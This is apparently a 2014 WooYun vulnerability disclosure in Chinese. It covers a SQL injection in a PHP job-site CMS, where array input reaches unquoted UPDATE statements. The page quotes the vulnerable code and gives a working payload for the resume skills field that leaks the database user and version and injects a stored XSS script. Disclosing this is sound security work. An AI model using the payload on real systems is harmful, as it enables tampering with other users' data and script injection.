乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-09: 细节已通知厂商并且等待厂商处理中 2014-08-09: 厂商已经确认,细节仅向厂商公开 2014-08-19: 细节向核心白帽子及相关领域专家公开 2014-08-29: 细节向普通白帽子公开 2014-09-08: 细节向实习白帽子公开 2014-09-23: 细节向公众公开
v3.4 20140808
include/common.fun.php
function updatetable($tablename, $setsqlarr, $wheresqlarr, $silent=0) { global $db; $setsql = $comma = ''; foreach ($setsqlarr as $set_key => $set_value) { if(is_array($set_value)) { //如果是数组就取第一个元素 $setsql .= $comma.'`'.$set_key.'`'.'='.$set_value[0]; //没引号 } else { $setsql .= $comma.'`'.$set_key.'`'.'=\''.$set_value.'\''; //有引号 } $comma = ', '; } $where = $comma = ''; if(empty($wheresqlarr)) { $where = '1'; } elseif(is_array($wheresqlarr)) { foreach ($wheresqlarr as $key => $value) { $where .= $comma.'`'.$key.'`'.'=\''.$value.'\''; $comma = ' AND '; } } else { $where = $wheresqlarr; } return $db->query("UPDATE ".($tablename)." SET ".$setsql." WHERE ".$where, $silent?"SILENT":"");}
user/personal/personal_resume.php 284行:
elseif ($act=='make3_save'){ if (intval($_POST['pid'])==0 ) showmsg('参数错误!',1); $setsqlarrspecialty['specialty']=!empty($_POST['specialty'])?$_POST['specialty']:showmsg('请填写您的技能特长!',1); //specialty可作数组传入 $_CFG['audit_edit_resume']!="-1"?$setsqlarrspecialty['audit']=intval($_CFG['audit_edit_resume']):""; updatetable(table('resume'),$setsqlarrspecialty," id='".intval($_POST['pid'])."' AND uid='".intval($_SESSION['uid'])."'"); //进入查询 updatetable(table('resume_tmp'),$setsqlarrspecialty," id='".intval($_POST['pid'])."' AND uid='".intval($_SESSION['uid'])."'"); check_resume($_SESSION['uid'],intval($_REQUEST['pid'])); if ($_POST['go_resume_show']) { header("Location: ?act=resume_show&pid={$_POST['pid']}"); } else { header("Location: ?act=make4&pid=".intval($_POST['pid'])); }}
这个注入可以越权更改任意简历,或是插入xss。在个人简历技能特长处填入:
concat(user(),0x0a,version(),0x0a,0x3C7363726970743E616C657274282F7873732F293C2F7363726970743E)
过滤函数绕不过,只能找找二次注入
加引号&过滤.
危害等级:高
漏洞Rank:18
确认时间:2014-08-09 17:41
感谢您提交的漏了和修复方案!
暂无